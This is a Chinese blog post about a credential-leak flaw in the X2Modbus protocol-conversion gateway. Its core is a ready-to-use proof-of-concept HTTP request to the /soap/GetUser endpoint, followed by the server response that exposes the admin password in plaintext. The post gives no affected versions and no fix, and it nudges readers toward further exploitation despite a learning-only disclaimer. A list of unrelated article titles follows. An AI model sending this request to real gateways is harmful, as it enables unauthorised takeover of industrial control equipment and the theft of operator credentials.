讯饶科技 X2Modbus 敏感信息泄露

讯饶科技 X2Modbus 敏感信息泄露

漏洞描述

X2Modbus是一款功能很强大的协议转换网关, 这里的X代表各家不同
的通信协议,2是To的谐音表示转换,Modbus就是最终支持的标准协议
是Modbus协议。使得用户可以根据现场设备的通信协议进行配置,转成
标准的Modbus协议。在PC端仿真运行无误后,上传到硬件协议转换网
关。
在其中存在一个可以getuser的接口,其中就会泄露账号密码等信息

影响版本

不详

实现原理

通过调用getuser接口来获取账号密码信息,从而可以登录后台

漏洞复现

在这里插入图片描述
接口在/soap/GetUser构造请求数据包

POST /soap/GetUser  HTTP/1.1
Host: 0.0.0.0
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://0.0.0.0/login.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: language=zh-cn; username=admin1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 58


<GetUser><User Name="admin" Password="admin"/></GetUser>

查看返回包

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/xml; charset=utf-8
Set-Cookie: language=zh-cn; username=admin1
Content-Length: 407
<soap:Body>
<GetUserResult>
<UserName>admin</UserName>
<PassWord>admin123456</PassWord>
<Purview>4</Purview>
</GetUserResult>
</soap:Body>
</soap:Envelope>

emmm这里就复现成功了,接下来师傅们懂得

修复建议

暂无

注: 文章只为学习交流安全技术,有人非法盈利后果自行承担

相关推荐

  1. GSIL:GitHub敏感信息泄露监控工具使用

    2024-04-30 22:16:01       44 阅读

最近更新

  1. 稀疏之美:在Mojo模型中实现特征的稀疏表示

    2024-04-30 22:16:01       0 阅读
  2. AI开发者的编程语言Mojo:入门指南

    2024-04-30 22:16:01       0 阅读
  3. 跨语言的智能:在多种编程环境中部署Mojo模型

    2024-04-30 22:16:01       0 阅读
  4. Mojo编程语言详细介绍

    2024-04-30 22:16:01       0 阅读
  5. 掌握MOJO命令行:参数解析的艺术

    2024-04-30 22:16:01       0 阅读
  6. 运营商二三要素是什么?有什么意义

    2024-04-30 22:16:01       0 阅读
  7. 3102. 最小化曼哈顿距离

    2024-04-30 22:16:01       0 阅读
  8. PHP String manipulation: A comprehensive guide

    2024-04-30 22:16:01       1 阅读
  9. Qt5 Ubuntu18 QStackedWidget

    2024-04-30 22:16:01       1 阅读

热门阅读

  1. UI设计饱和了吗?赚钱吗?

    2024-04-30 22:16:01       17 阅读
  2. Method

    Method

    2024-04-30 22:16:01      11 阅读
  3. python字节串和数字互转

    2024-04-30 22:16:01       13 阅读
  4. 程序包 org.junit 不存在解决方案

    2024-04-30 22:16:01       11 阅读
  5. 安全架构概述

    2024-04-30 22:16:01       12 阅读
  6. 【工程记录】ChatGLM3-6B微调实践的更新说明

    2024-04-30 22:16:01       13 阅读
  7. 前端项目文件夹命名,用横线好,还行下划线好

    2024-04-30 22:16:01       14 阅读
  8. Python 学习笔记

    2024-04-30 22:16:01       12 阅读